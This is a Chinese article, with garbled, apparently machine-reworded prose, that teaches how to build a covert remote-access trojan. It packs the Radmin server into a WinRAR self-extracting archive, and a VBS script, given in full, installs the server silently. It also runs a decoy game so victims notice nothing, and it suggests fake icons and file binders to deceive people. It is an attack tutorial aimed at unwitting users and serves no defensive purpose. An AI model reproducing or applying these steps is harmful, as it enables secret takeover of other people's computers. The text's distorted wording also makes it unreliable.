再谈Radmin——对“自己丰衣足食”一文的补充

  作者：redbin[S.H.C]  QQ 50950204  Email: redbin@vip.163.com 
  HttP://WwW.SchoolHacker.COM
  Radmim作为一款优秀的长途管理东西，深得安全界广大黑黑们的喜好,从看X刊到如今，看到写Radmim的文章也有不少了，本日特地把看到的东东来作个小增补，让各人把Radmim这款宝马用的越发自在。
  在X上，2005年第一期Page42有雪蓓朋侪写的“自己丰衣足食”文章对Radmim的利用结合了制造winrar自解压木马的思绪的确很不错，不外在利用历程中，我发明了有两处不大妥当的地方，后经自己的测试，终于觅得一新方法办理这两个毛病，So，本日我就冒充一次大菜鸟来把我的方法给各人讲述出来，（只听旁边窃窃私语：redbin脸皮真厚，竟然冒充大菜鸟）
  起首我先讲下，按该文制造后所呈现的两个毛病：
  1.运行后闪出一个黑黑的下令行窗口。
  各人按照文章制造后，不晓得有没有在自己机器上运行测试一下，不要报告我你怕中木马，自己配制的东西，自己对它就要有信心嘛！在测试历程中我们发明运行自解压文件后，会弹出那个黑黑的下令行窗口一闪而过，这是怎么回事呢？其实这便是由于我们在制造历程中利用了批处置惩罚文件bat。调用运行的是这个批处置惩罚文件，而批处置惩罚的运行会调用cmd或command来运行下令，因此会弹出那个讨厌的，心烦的，想砸死它，想踩死它（小菜语：你有完没完）的下令行窗口，哎。都弹出这东西了，那运行的人一定会猜疑的，再菜的也该意识到中招了，固然会查抄查抄再查抄来删除掉我们的木马。以上为毛病一。
  2.文件除了运行一个批处置惩罚后没有运行其他东西来粉饰我们的木马。
  按原文方法制造后，运行制造好的自解压文件后，只会弹出一个下令行窗口，而没其它的玩意，我们先假想一下，如果我们修改下让该程序不再弹出下令行窗口后，运行该文件就会什么反映也没，固然，我所说的什么反映也没是指运行后无任何东东表如今屏幕上，（小菜语：不是有表现一个CMD窗口吗？还有便是反正木马已经在运行后自己安装终了并运行了，我们还有什么好怕的呢）我晕，起首我说了，我们是假设修改成一个不表现CMD窗口的文件，但是你不觉得运行一个文件，它没有任何表现要比运行它呈现一个下令行窗口越发畏惧吗？没有任何表现，超等典型的中马特性啊！以上是毛病二。
  那该怎么办？嘿嘿，该怎么办就怎么办！下面就由超等大菜鸟redbin给各人讲述自己的办法来完成我们心中抱负木马的目的。
  起首我们还是要按照原作者的制造方法来制造，只不外不同的是，我们利用的不是bat文件了，我们用vbs文件来完成这个无闪下令行窗口的木马，编写vbs文件，代码如下：（PS:剧本的制造泉源于校盟的r4t到场写作完成，在此对他表示谢谢）
  On Error Resume Next
  set wshshell=createobject ("wscript.shell" )
  a=wshshell.run ("r_server.exe /stop",0)
  b=wshshell.run ("r_server.exe /install /silence",0)
  c=wshshell.run ("regedit /e reg.reg",0)
  d=wshshell.run ("redbin.exe",0)
  各人应该有发明我们还要把bat文件的下令移植到vbs里了，是的，vbs文件运行起来有一个好处便是可以让下令无表现运行，这样就可以不再闪出那个讨厌的，心烦的，想砸死的，踩死的（众人皆倒：我晕，又来了）讨厌的cmd窗口，滚一边去吧！（旁边一小菜发言：redbin，为什么你写的vbs里多了一个了一个redbin.exe啊）好，我便是在等人问这个呢，孺子可教也！下面给各人表明一下，这个redbin.exe是我们必要找到一款小游戏或者flash。慢，先别慌着搜刮redbin.exe，你搜刮不出来的，我自己还不记得啥时间做过一个redbin.exe呢，我的意思是，去找一个小游戏或者flash，也要放到这个自解压文件中去，由redbin.vbs来调用到它，诱惑它运行起来，以此来麻木那些运行了你的木马的用户，嘿嘿，够阴吧！哈哈哈哈哈（小木头：redbin一定有癫狂症）好了，不笑了，我下面把制造方法给各人展示一下，我们把r_server.exe AdmDll.dll raddrv.dll redbin.exe redbin.reg redbin.vbs放到一同，然后制造这个自解压文件，同样，我们切换到途径项，在这样放后运行空里写上redbin.vbs然后紧缩成我们的自解压文件，如今这个小东东就OK了，固然我们可以再美化一下这个小东西，找一款文件图标，修改东西，或者间接操作出exesope来修改一下之后的图标，让它越发像个游戏图标了，那样就更容易去蒙过很多多少人了，好了，到这里也就给各人讲完了，不要急着翻页，我还要说上两个东东，我在这里再给各人两个思绪，各人可以看下哪种更完善就利用。
  1.redbin.vbs里去掉set cmd="redbin.exe",0一行，不外redbin.exe还要放在自解压文件里，然后我们在写开释途径的时间这样写，redbin.vbs&redbin.exe  这样也可以实行redbin.exe文件的运行，固然你会说和第一种没什么区别，在这我只是给各人一先容那标记，用它可以在一行下令里写个多个下令云云而已。这个没有测试，谁有测试若经过的还请报告我一声：）
  2.我们还是不写set cmd="redbin.exe",0一行，同时也不把redbin.exe文件放入自解压文件，我们可以利用文件捆绑器，把制造的没有redbin.exe的自解压木马与redbin.exe文件归并成一个新的文件。
  好了，这两个思绪也没什么新意，只是随便给各人先容一下，文章若有不足之处，还望妙手指正，欢迎各人和我一同交换技能，我的qq：50950204
  续：3月20日，又想到了该剧本的不足，我们可以结合以前看过的魔女の条件写的“狙击4899肉鸡一文中”写的的批处置惩罚来修改我写的剧本得以制造一个更换掉办事来运行的RADMIN，那样可以让你的木马越发肆意！详细剧本代码我就不写了，以免有骗稿费的嫌疑，如果有乐意和我交换技能的欢迎加我们的群：6160610，谢谢各人！
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：